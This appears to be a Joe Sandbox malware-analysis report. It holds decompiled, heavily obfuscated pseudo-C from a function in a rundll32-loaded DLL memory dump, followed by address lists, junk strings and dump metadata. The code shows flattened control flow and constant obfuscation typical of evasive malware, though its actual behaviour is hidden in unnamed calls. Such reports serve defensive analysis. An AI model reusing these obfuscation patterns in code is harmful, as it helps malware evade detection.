				_v480 = _v480 + 0xffffaf2b;
				_v480 = _v480 | 0xa623b0fd;
				_v480 = _v480 ^ 0xa62b899a;
				_v204 = 0x66fa;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0x0066e5e6;
				_v340 = 0x4192;
				_v340 = _v340 / _t1299;
				_v340 = _v340 / _t1428;
				_v340 = _v340 ^ 0x00003034;
				_v464 = 0xd2ea;
				_v464 = _v464 >> 0xa;
				_t1408 = 0x21;
				_v464 = _v464 / _t1408;
				_v464 = _v464 >> 2;
				_v464 = _v464 ^ 0x00007050;
				_v320 = 0x49ac;
				_v320 = _v320 << 8;
				_v320 = _v320 ^ 0xfb939db0;
				_v320 = _v320 ^ 0xfbda5041;
				_v428 = 0x3fd1;
				_v428 = _v428 | 0x92cdb814;
				_v428 = _v428 << 6;
				_v428 = _v428 ^ 0xb36ff540;
				_v516 = 0xac08;
				_t1429 = 0x50;
				_v516 = _v516 / _t1429;
				_v516 = _v516 << 0xd;
				_v516 = _v516 << 6;
				_v516 = _v516 ^ 0x100461c8;
				_v308 = 0x4309;
				_v308 = _v308 << 0xd;
				_v308 = _v308 ^ 0x08613770;
				_v552 = 0x9a83;
				_v552 = _v552 >> 0xe;
				_v552 = _v552 / _t1408;
				_v552 = _v552 + 0xffffc968;
				_v552 = _v552 ^ 0xffffc969;
				_v396 = 0xd172;
				_v396 = _v396 ^ 0x239e13fe;
				_t1430 = 0x78;
				_v396 = _v396 * 0x38;
				_v396 = _v396 ^ 0xcaba8100;
				_v160 = 0x81d1;
				_v160 = _v160 << 0xf;
				_v160 = _v160 ^ 0x40e89f40;
				_v376 = 0x9bd1;
				_v376 = _v376 >> 0xb;
				_v376 = _v376 | 0x8dece6a5;
				_v376 = _v376 ^ 0x8de15d17;
				_v368 = 0xa942;
				_v368 = _v368 / _t1430;
				_v368 = _v368 >> 0xe;
				_v368 = _v368 ^ 0x000ef420;
				_v352 = 0xcab9;
				_v352 = _v352 >> 6;
				_v352 = _v352 << 0xc;
				_v352 = _v352 ^ 0x0032afa0;
				_v520 = 0x575a;
				_t1431 = 0x33;
				_t1432 = _v452;
				_v520 = _v520 / _t1431;
				_t1409 = _v452;
				_v520 = _v520 / _t1408;
				_v520 = _v520 * 0x27;
				_v520 = _v520 ^ 0x00001ebb;
				while(1) {
					L1:
					_t1180 = 0x26b3c509;
					do {
						while(1) {
							L2:
							_t1447 = _t1302 - 0x1dd159f4;
							if(_t1447 > 0) {
								break;
							}
							if(_t1447 == 0) {
								E10011F54();
								_t1302 = 0x32b5f2ec;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							_t1448 = _t1302 - 0x11b22f62;
							if(_t1448 > 0) {
								__eflags = _t1302 - 0x1a1d010e;
								if(__eflags > 0) {
									__eflags = _t1302 - 0x1accdd0a;
									if(_t1302 == 0x1accdd0a) {
										E100033F4(_v324, _v564, _v244, _v188, _v140);
										_t1440 = _t1440 + 0xc;
										L55:
										_t1302 = 0x27e5de8;
										while(1) {
											L1:
											_t1180 = 0x26b3c509;
											goto L2;
										}
									}
									__eflags = _t1302 - 0x1b93f384;
									if(_t1302 == 0x1b93f384) {
										E100068D8();
										_t1302 = 0x2a3d3775;
										while(1) {
											L1:
											_t1180 = 0x26b3c509;
											goto L2;
										}
									}
									__eflags = _t1302 - 0x1bd43c79;
									if(__eflags == 0) {
										_t1302 = 0x1e013a7c;
										continue;
									}
									__eflags = _t1302 - 0x1c27d8f2;
									if(_t1302 != 0x1c27d8f2) {
										goto L105;
									}
									E10002C93();
									E10018314();
									asm("sbb ecx, ecx");
									_t1302 = (_t1302 & 0xeb1b6708) + 0x32b5f2ec;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								if(__eflags == 0) {
									_t1302 = 0x10b5273f;
									_v96 = _v516;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x1314a566;
								if(_t1302 == 0x1314a566) {
									E100033F4(_v364, _v572, _v260, _v420, _v88);
									_t1440 = _t1440 + 0xc;
									L45:
									_t1302 = 0xd26623c;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x134e219d;
								if(_t1302 == 0x134e219d) {
									E100019B4();
									_t1302 = 0xd2fe09a;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x13daa562;
								if(_t1302 == 0x13daa562) {
									_t1276 = E100048C7( &_v140, _v580,  &_v124, _v164, _v276, _v524);
									_t1440 = _t1440 + 0x10;
									__eflags = _t1276;
									if(__eflags == 0) {
										L30:
										_t1302 = 0x1accdd0a;
										while(1) {
											L1:
											_t1180 = 0x26b3c509;
											goto L2;
										}
									}
									E10011494();
									__eflags = _v116;
									_t1302 = 0x134e219d;
									if(__eflags == 0) {
										while(1) {
											L1:
											_t1180 = 0x26b3c509;
											goto L2;
										}
									}
									__eflags = _v116 - 7;
									_t1180 = 0x26b3c509;
									_t1302 =  ==  ? 0x26b3c509 : 0x134e219d;
									continue;
								}
								__eflags = _t1302 - 0x16005848;
								if(__eflags != 0) {
									goto L105;
								}
								_t1302 = 0x2e39497;
								continue;
							}
							if(_t1448 == 0) {
								_t1180 = E1001E0B6();
								L109:
								return _t1180;
							}
							_t1449 = _t1302 - 0xb290583;
							if(_t1449 > 0) {
								__eflags = _t1302 - 0xd26623c;
								if(__eflags == 0) {
									_push(_t1302);
									__eflags = E10017B11(_t1409, __eflags);
									if(__eflags != 0) {
										L16:
										_t1302 = 0x2315912d;
										while(1) {
											L1:
											_t1180 = 0x26b3c509;
											goto L2;
										}
									}
									_t1302 = _t1432;
									L104:
									_t1180 = 0x26b3c509;
									goto L105;
								}
								__eflags = _t1302 - 0xd2fe09a;
								if(__eflags == 0) {
									__eflags = E10018489(_v284, _v588, __eflags,  &_v124);
									if(__eflags != 0) {
										_t1409 = _v428;
										_t1432 = 0x3a5ce9e8;
									}
									goto L30;
								}
								__eflags = _t1302 - 0x1086eb0d;
								if(_t1302 == 0x1086eb0d) {
									E1000B22A();
									_t1302 = 0x27ababe3;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x10b5273f;
								if(__eflags != 0) {
									goto L105;
								}
								_t1302 = 0x3a5ce9e8;
								_v92 = _v308;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1449 == 0) {
								_t1326 = _v436;
								E1000EBA4(_t1326, _v316, _v468,  &_v132,  &_v112);
								_t1440 = _t1440 + 0xc;
								asm("sbb ecx, ecx");
								_t1302 = (_t1326 & 0x05f62068) + 0x3558f604;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1302 == 0x247d67b) {
								_v100 = E1001E8F0();
								_t1302 = 0x1a1d010e;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1302 == 0x27e5de8) {
								E100033F4(_v532, _v444, _v604, _v500, _v132);
								_t1440 = _t1440 + 0xc;
								_t1302 = 0x3558f604;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1302 == 0x2e39497) {
								_t1180 = E1000E891(_t1302, __eflags);
								__eflags = _t1180;
								if(__eflags == 0) {
									goto L109;
								}
								_t1302 = 0x390e3d92;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1302 == 0x51ff6ae) {
								_t1259 = E1001DA27(_v212,  &_v68, _v300, _v448, _v176);
								_t1440 = _t1440 + 0x10;
								__eflags = _t1259;
								if(__eflags == 0) {
									goto L16;
								}
								_v112 =  &_v68;
								_t1261 = E10009E6E(_v380, _v540, _v620, _v312,  &_v68);
								_t1440 = _t1440 + 0xc;
								_v108 = _t1261;
								_t1302 = 0x3b8693b0;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(_t1302 != 0x8d56928) {
								goto L105;
							}
							_v104 = E1001D5DF();
							_t1302 = 0x247d67b;
							while(1) {
								L1:
								_t1180 = 0x26b3c509;
								goto L2;
							}
						}
						__eflags = _t1302 - 0x2e6905fa;
						if(__eflags > 0) {
							__eflags = _t1302 - 0x3558f604;
							if(__eflags > 0) {
								__eflags = _t1302 - 0x390e3d92;
								if(_t1302 == 0x390e3d92) {
									E1001B977();
									_t1302 = 0x2710de7c;
									goto L104;
								}
								__eflags = _t1302 - 0x3a5ce9e8;
								if(_t1302 == 0x3a5ce9e8) {
									E10006AFC(_v488, _v496, _v504,  &_v88, _v512);
									_t1440 = _t1440 + 0xc;
									_t1302 = 0x32775a9c;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x3b4f166c;
								if(_t1302 == 0x3b4f166c) {
									_push(_v568);
									_push(_v560);
									_push( &_v140);
									_push(_v240);
									_push(_v232);
									_t1187 = E1000BEBD(_v552,  &_v132);
									_t1441 = _t1440 + 0x14;
									__eflags = _t1187;
									if(__eflags == 0) {
										E10013B5A();
										_t1432 = 0x3a5ce9e8;
										_t1195 = E100180F6(_v520, _v352, __eflags);
										_t1440 = _t1441 - 0x10 + 0x10;
										_t1409 = _t1195;
										goto L55;
									}
									_t1432 = 0x3a5ce9e8;
									_t1200 = E100180F6(_v368, _v376, __eflags);
									_t1440 = _t1441 - 0x10 + 0x10;
									_t1409 = _t1200;
									_t1302 = 0x13daa562;
									while(1) {
										L1:
										_t1180 = 0x26b3c509;
										goto L2;
									}
								}
								__eflags = _t1302 - 0x3b8693b0;
								if(__eflags != 0) {
									goto L105;
								}
								_v72 = E10013E55();
								_t1302 = 0x8d56928;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							if(__eflags == 0) {
								E100033F4(_v256, _v264, _v272, _v384, _v80);
								_t1440 = _t1440 + 0xc;
								_t1302 = 0x1314a566;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x319984b8;
							if(_t1302 == 0x319984b8) {
								E1001B598();
								asm("sbb ecx, ecx");
								_t1308 = _t1302 & 0xf61e3bde;
								L81:
								_t1302 = _t1308 + 0x1b93f384;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x32775a9c;
							if(_t1302 == 0x32775a9c) {
								E1001B459(_v280, _v576, _v584,  &_v80);
								_t1302 = 0xb290583;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x32b5f2ec;
							if(_t1302 == 0x32b5f2ec) {
								E10002571();
								_t1302 = 0x11b22f62;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x32da3ca5;
							if(__eflags != 0) {
								goto L105;
							}
							_push(_v440);
							_v148 = E10008CF3(_v600, _v304, __eflags, _t1302,  &_v144);
							E100042DE(_v296, _v432, __eflags,  &_v148);
							E1000717B(_v288, _v408, _v416, _v148, _v424);
							_t1440 = _t1440 + 0x1c;
							_t1302 = 0x1bd43c79;
							while(1) {
								L1:
								_t1180 = 0x26b3c509;
								goto L2;
							}
						}
						if(__eflags == 0) {
							__eflags = E10019726();
							if(__eflags == 0) {
								E10018314();
								asm("sbb ecx, ecx");
								_t1302 = (_t1302 & 0x1b21e83b) + 0x1086eb0d;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							E10018314();
							asm("sbb ecx, ecx");
							_t1308 = _t1302 & 0x16059134;
							__eflags = _t1308;
							goto L81;
						}
						__eflags = _t1302 - _t1180;
						if(__eflags > 0) {
							__eflags = _t1302 - 0x2710de7c;
							if(_t1302 == 0x2710de7c) {
								_t1180 = E10017B8D();
								__eflags = _t1180;
								if(_t1180 == 0) {
									goto L109;
								}
								E1000BDAB(_v616);
								_t1302 = 0x1f1ad5e4;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x27ababe3;
							if(_t1302 == 0x27ababe3) {
								E1001CF07();
								_t1302 = 0x1f098d9d;
								while(1) {
									L1:
									_t1180 = 0x26b3c509;
									goto L2;
								}
							}
							__eflags = _t1302 - 0x2a3d3775;
							if(__eflags == 0) {
								_t1302 = 0x32da3ca5;
								goto L2;
							}
							__eflags = _t1302 - 0x2ba8d348;
							if(_t1302 != 0x2ba8d348) {
								goto L105;
							}
							E1001E9A2();
							_t1302 = 0x1086eb0d;
							while(1) {
								L1:
								_t1180 = 0x26b3c509;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_t1180 = E10014602();
							goto L109;
						}
						__eflags = _t1302 - 0x1e013a7c;
						if(__eflags == 0) {
							_t1432 = 0x51ff6ae;
							_t1288 = E100180F6(_v160, _v396, __eflags);
							_t1440 = _t1440 - 0x10 + 0x10;
							_t1409 = _t1288;
							goto L45;
						}
						__eflags = _t1302 - 0x1f098d9d;
						if(_t1302 == 0x1f098d9d) {
							_t1180 = E1000AE9E();
							__eflags = _t1180;
							if(__eflags == 0) {
								goto L109;
							}
							_t1302 = 0x1c27d8f2;
							while(1) {
								L1:
								_t1180 = 0x26b3c509;
								goto L2;
							}
						}
						__eflags = _t1302 - 0x1f1ad5e4;
						if(_t1302 == 0x1f1ad5e4) {
							E10007B6A();
							asm("sbb ecx, ecx");
							_t1302 = (_t1302 & 0xf942a5e9) + 0x2e6905fa;
							goto L1;
						}
						__eflags = _t1302 - 0x2315912d;
						if(_t1302 != 0x2315912d) {
							goto L105;
						}
						_t1180 = E1000A7FA(_t1302);
						goto L109;
						L105:
						__eflags = _t1302 - 0x317f229e;
					} while (__eflags != 0);
					goto L109;
				}
			}

0x10004ad9
0x10004ae3
0x10004af0
0x10004afb
0x10004b00
0x10004b0b
0x10004b13
0x10004b1b
0x10004b20
0x10004b28
0x10004b30
0x10004b3b
0x10004b46
0x10004b4e
0x10004b59
0x10004b64
0x10004b6f
0x10004b7a
0x10004b85
0x10004b90
0x10004b9b
0x10004ba3
0x10004bb1
0x10004bb6
0x10004bc0
0x10004bc5
0x10004bcb
0x10004bd3
0x10004bde
0x10004be9
0x10004bf4
0x10004bfc
0x10004c04
0x10004c0c
0x10004c14
0x10004c1c
0x10004c27
0x10004c32
0x10004c3d
0x10004c48
0x10004c54
0x10004c59
0x10004c5f
0x10004c67
0x10004c6c
0x10004c74
0x10004c7f
0x10004c8a
0x10004c95
0x10004ca0
0x10004cb2
0x10004cb7
0x10004cc0
0x10004ccb
0x10004cd6
0x10004ce8
0x10004ceb
0x10004cf2
0x10004cfd
0x10004d0a
0x10004d1f
0x10004d22
0x10004d29
0x10004d34
0x10004d3f
0x10004d4c
0x10004d50
0x10004d58
0x10004d60
0x10004d68
0x10004d7c
0x10004d7d
0x10004d91
0x10004d9a
0x10004da5
0x10004db0
0x10004dbb
0x10004dc6
0x10004dd1
0x10004de4
0x10004de7
0x10004de8
0x10004def
0x10004dfa
0x10004e05
0x10004e0d
0x10004e15
0x10004e1a
0x10004e22
0x10004e2a
0x10004e35
0x10004e40
0x10004e48
0x10004e50
0x10004e5b
0x10004e66
0x10004e71
0x10004e7c
0x10004e87
0x10004e8f
0x10004e9a
0x10004ea5
0x10004ead
0x10004eb8
0x10004ebf
0x10004eca
0x10004ed2
0x10004edd
0x10004ee8
0x10004ef3
0x10004efe
0x10004f06
0x10004f11
0x10004f1f
0x10004f23
0x10004f28
0x10004f30
0x10004f38
0x10004f43
0x10004f4e
0x10004f59
0x10004f64
0x10004f6f
0x10004f7a
0x10004f87
0x10004f9c
0x10004f9f
0x10004fa0
0x10004fa7
0x10004fb2
0x10004fbd
0x10004fc8
0x10004fd3
0x10004fde
0x10004fe6
0x10004fee
0x10004ff6
0x10004ffe
0x10005006
0x10005011
0x10005019
0x10005024
0x1000502f
0x1000503a
0x10005045
0x10005050
0x1000505b
0x10005066
0x10005071
0x10005079
0x10005084
0x1000508f
0x100050a5
0x100050ac
0x100050b7
0x100050c2
0x100050d7
0x100050d8
0x100050df
0x100050ea
0x100050f5
0x100050fd
0x10005108
0x10005113
0x1000511e
0x10005134
0x1000513b
0x10005146
0x1000514e
0x10005157
0x10005161
0x10005165
0x1000516d
0x10005178
0x10005183
0x1000518e
0x10005199
0x100051a1
0x100051ac
0x100051b7
0x100051c2
0x100051cd
0x100051d8
0x100051e3
0x100051ee
0x100051f9
0x10005204
0x1000520c
0x10005217
0x10005222
0x1000522f
0x1000523a
0x10005245
0x10005250
0x1000525b
0x10005266
0x10005271
0x10005282
0x10005287
0x10005290
0x1000529b
0x100052a3
0x100052ab
0x100052b5
0x100052b8
0x100052bc
0x100052c4
0x100052cc
0x100052d1
0x100052d6
0x100052de
0x100052e6
0x100052f9
0x10005300
0x1000530b
0x10005316
0x10005321
0x10005329
0x10005334
0x1000533f
0x10005347
0x1000534f
0x10005357
0x10005362
0x1000536d
0x10005378
0x10005383
0x1000538b
0x10005390
0x1000539a
0x1000539e
0x100053a6
0x100053bc
0x100053c3
0x100053ce
0x100053d9
0x100053e4
0x100053ef
0x100053fa
0x10005405
0x10005410
0x1000541b
0x10005426
0x10005435
0x10005438
0x1000543f
0x1000544a
0x10005455
0x1000545d
0x10005468
0x1000546f
0x1000547a
0x10005485
0x1000548d
0x10005498
0x100054a0
0x100054aa
0x100054b2
0x100054ba
0x100054c2
0x100054ca
0x100054d2
0x100054da
0x100054e1
0x100054e4
0x100054e8
0x100054f0
0x100054fb
0x10005503
0x1000550e
0x10005519
0x10005524
0x1000552f
0x10005537
0x10005542
0x10005558
0x1000555f
0x1000556a
0x10005572
0x1000557d
0x10005588
0x10005593
0x1000559e
0x100055b1
0x100055b2
0x100055b9
0x100055c4
0x100055cc
0x100055d4
0x100055d9
0x100055dd
0x100055e5
0x100055ed
0x100055fd
0x10005601
0x10005609
0x10005611
0x1000561c
0x10005627
0x10005632
0x1000563d
0x10005648
0x10005653
0x1000565e
0x10005669
0x10005674
0x1000567c
0x10005681
0x10005686
0x1000568e
0x10005696
0x100056a4
0x100056a8
0x100056ac
0x100056b1
0x100056b9
0x100056cc
0x100056d3
0x100056de
0x100056f1
0x100056f8
0x10005703
0x1000571a
0x1000571d
0x1000572c
0x10005733
0x1000573e
0x10005749
0x10005754
0x1000575f
0x10005767
0x1000576f
0x10005774
0x1000577c
0x10005784
0x10005791
0x10005795
0x1000579d
0x100057a2
0x100057aa
0x100057b5
0x100057c0
0x100057cb
0x100057d6
0x100057de
0x100057e9
0x100057f1
0x100057fe
0x10005802
0x10005807
0x1000580f
0x10005821
0x10005826
0x1000582f
0x1000583a
0x10005845
0x10005850
0x1000585b
0x10005866
0x10005871
0x1000587c
0x10005887
0x10005892
0x100058a4
0x100058a7
0x100058ae
0x100058b9
0x100058c1
0x100058c9
0x100058ce
0x100058d6
0x100058de
0x100058e9
0x100058f4
0x100058fc
0x10005907
0x1000590f
0x10005917
0x1000591f
0x10005924
0x1000592c
0x10005937
0x10005942
0x1000594d
0x10005960
0x10005967
0x10005972
0x1000597a
0x10005981
0x10005989
0x10005991
0x10005999
0x100059a4
0x100059af
0x100059b7
0x100059c2
0x100059ca
0x100059d9
0x100059dc
0x100059e0
0x100059e8
0x100059f0
0x100059fb
0x10005a06
0x10005a11
0x10005a1c
0x10005a27
0x10005a32
0x10005a3d
0x10005a48
0x10005a53
0x10005a5e
0x10005a69
0x10005a74
0x10005a7f
0x10005a8a
0x10005a95
0x10005a9d
0x10005aa8
0x10005ab3
0x10005abe
0x10005ac9
0x10005ad4
0x10005adc
0x10005ae4
0x10005aec
0x10005af4
0x10005afc
0x10005b07
0x10005b12
0x10005b1d
0x10005b28
0x10005b3b
0x10005b42
0x10005b4d
0x10005b58
0x10005b60
0x10005b70
0x10005b77
0x10005b82
0x10005b8d
0x10005b95
0x10005ba0
0x10005bab
0x10005bb6
0x10005bc1
0x10005bc9
0x10005bd4
0x10005bea
0x10005bfa
0x10005c01
0x10005c0c
0x10005c17
0x10005c28
0x10005c32
0x10005c3e
0x10005c46
0x10005c51
0x10005c5c
0x10005c64
0x10005c6f
0x10005c7a
0x10005c85
0x10005c90
0x10005c98
0x10005ca3
0x10005cb7
0x10005cbc
0x10005cc3
0x10005ccb
0x10005cd3
0x10005cde
0x10005ce9
0x10005cf1
0x10005cfc
0x10005d04
0x10005d11
0x10005d15
0x10005d1d
0x10005d25
0x10005d30
0x10005d45
0x10005d48
0x10005d4f
0x10005d5a
0x10005d65
0x10005d6d
0x10005d78
0x10005d83
0x10005d8b
0x10005d96
0x10005da1
0x10005db7
0x10005dbe
0x10005dc6
0x10005dd1
0x10005ddc
0x10005de4
0x10005dec
0x10005df7
0x10005e09
0x10005e0e
0x10005e15
0x10005e1f
0x10005e26
0x10005e2f
0x10005e33
0x10005e3b
0x10005e3b
0x10005e3b
0x10005e40
0x10005e40
0x10005e40
0x10005e40
0x10005e46
0x00000000
0x00000000
0x10005e4c
0x1000625e
0x10006263
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005e52
0x10005e58
0x10006095
0x1000609b
0x100061ad
0x100061b3
0x1000623e
0x10006243
0x10006246
0x10006246
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100061b5
0x100061bb
0x1000620f
0x10006214
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100061bd
0x100061c3
0x100061fe
0x00000000
0x100061fe
0x100061c5
0x100061cb
0x00000000
0x00000000
0x100061d8
0x100061e4
0x100061eb
0x100061f3
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100060a1
0x1000619c
0x100061a1
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100060a7
0x100060ad
0x10006183
0x10006188
0x1000618b
0x1000618b
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100060b3
0x100060b9
0x10006154
0x10006159
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100060bf
0x100060c5
0x10006102
0x10006107
0x1000610a
0x1000610c
0x10006065
0x10006065
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006119
0x1000611e
0x10006126
0x1000612b
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006131
0x10006139
0x1000613e
0x00000000
0x1000613e
0x100060c7
0x100060cd
0x00000000
0x00000000
0x100060d3
0x00000000
0x100060d3
0x10005e5e
0x100066f5
0x1000670f
0x10006716
0x10006716
0x10005e64
0x10005e6a
0x10005ff0
0x10005ff6
0x1000607d
0x10006086
0x10006088
0x10005f40
0x10005f40
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000608e
0x100066d4
0x100066d4
0x00000000
0x100066d4
0x10005ff8
0x10005ffe
0x10006058
0x1000605a
0x1000605c
0x10006063
0x10006063
0x00000000
0x1000605a
0x10006000
0x10006006
0x10006030
0x10006035
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006008
0x1000600e
0x00000000
0x00000000
0x1000601b
0x1000601d
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005e70
0x10005fd0
0x10005fd7
0x10005fdc
0x10005fe1
0x10005fe9
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005e7c
0x10005fa1
0x10005fa8
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005e88
0x10005f89
0x10005f8e
0x10005f91
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005e94
0x10005f55
0x10005f5a
0x10005f5c
0x00000000
0x00000000
0x10005f62
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005ea0
0x10005ef6
0x10005efb
0x10005efe
0x10005f00
0x00000000
0x00000000
0x10005f11
0x10005f27
0x10005f2c
0x10005f2f
0x10005f36
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10005ea8
0x00000000
0x00000000
0x10005ec1
0x10005ec8
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000626d
0x10006273
0x10006437
0x10006439
0x10006581
0x10006587
0x100066ca
0x100066cf
0x00000000
0x100066cf
0x1000658d
0x1000658f
0x100066aa
0x100066af
0x100066b2
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006595
0x1000659b
0x100065c6
0x100065d1
0x100065dc
0x100065dd
0x100065e4
0x100065ef
0x100065f4
0x100065f7
0x100065f9
0x10006646
0x10006659
0x10006677
0x1000667c
0x1000667f
0x00000000
0x1000667f
0x10006609
0x10006627
0x1000662c
0x1000662f
0x10006631
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000659d
0x100065a3
0x00000000
0x00000000
0x100065b5
0x100065bc
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000643f
0x1000656f
0x10006574
0x10006577
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006445
0x1000644b
0x10006538
0x1000653f
0x10006541
0x1000640b
0x1000640b
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006451
0x10006457
0x10006520
0x10006527
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000645d
0x10006463
0x100064fa
0x100064ff
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006469
0x1000646f
0x00000000
0x00000000
0x10006475
0x100064a6
0x100064b5
0x100064dd
0x100064e2
0x100064e5
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006279
0x100063f1
0x100063f3
0x1000641d
0x10006424
0x1000642c
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x100063fc
0x10006403
0x10006405
0x10006405
0x00000000
0x10006405
0x1000627f
0x10006281
0x10006351
0x10006357
0x100063ba
0x100063bf
0x100063c1
0x00000000
0x00000000
0x100063d2
0x100063d7
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006359
0x1000635f
0x100063a4
0x100063a9
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006361
0x10006367
0x1000638f
0x00000000
0x1000638f
0x10006369
0x1000636f
0x00000000
0x00000000
0x10006380
0x10006385
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x10006287
0x1000670a
0x00000000
0x1000670a
0x1000628d
0x10006293
0x10006324
0x10006342
0x10006347
0x1000634a
0x00000000
0x1000634a
0x10006295
0x1000629b
0x100062fc
0x10006301
0x10006303
0x00000000
0x00000000
0x10006309
0x10005e3b
0x10005e3b
0x10005e3b
0x00000000
0x10005e3b
0x10005e3b
0x1000629d
0x100062a3
0x100062d4
0x100062db
0x100062e3
0x00000000
0x100062e3
0x100062a5
0x100062ab
0x00000000
0x00000000
0x100062bf
0x00000000
0x100066d9
0x100066d9
0x100066d9
0x00000000
0x100066e5

Strings

ZM2, xrefs: 10005845
}V, xrefs: 10004F4E
3(, xrefs: 10005245
ZW, xrefs: 10005DF7
'T, xrefs: 1000508F
|., xrefs: 10005290
Kk, xrefs: 100059F0
=, xrefs: 100053A6
qV, xrefs: 10005807
8Q, xrefs: 10004C48
cB, xrefs: 10004F06
j^, xrefs: 10005266
f, xrefs: 10005BC9
tj, xrefs: 10005999
$?, xrefs: 10004BCB
*=, xrefs: 10005632
H., xrefs: 10005024
#Z, xrefs: 1000592C
u7=*, xrefs: 10006361
40, xrefs: 10005C01
r, xrefs: 1000594D
<b&, xrefs: 10005FF0
{DL, xrefs: 100054DA
bP5A, xrefs: 100054BA
Pp, xrefs: 10005C46
07, xrefs: 10005217
[I, xrefs: 10004BA3
l, xrefs: 10005A5E
8r, xrefs: 10004F64
u7=*, xrefs: 10006214
C, xrefs: 10005CDE
\:, xrefs: 10005C39
A-, xrefs: 10004D3F
e;, xrefs: 10005A1C
j[, xrefs: 100051EE
_, xrefs: 100055C4
f, xrefs: 100056C4
O_, xrefs: 1000547A
yq, xrefs: 10004EBF
<b&, xrefs: 1000618B
G', xrefs: 10004CA0
HX, xrefs: 1000557D
k|, xrefs: 10005519
'=, xrefs: 10004B00

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$#Z$$?$'=$'T$*=$07$3($40$8Q$8r$<b&$<b&$=$A-$G'$H.$HX$Kk$O_$Pp$ZM2$ZW$[I$_$bP5A$cB$e;$j[$j^$k|$qV$r$tj$u7=*$u7=*$yq${DL$|.$}V$l$\:$f$f
API String ID: 0-245086209
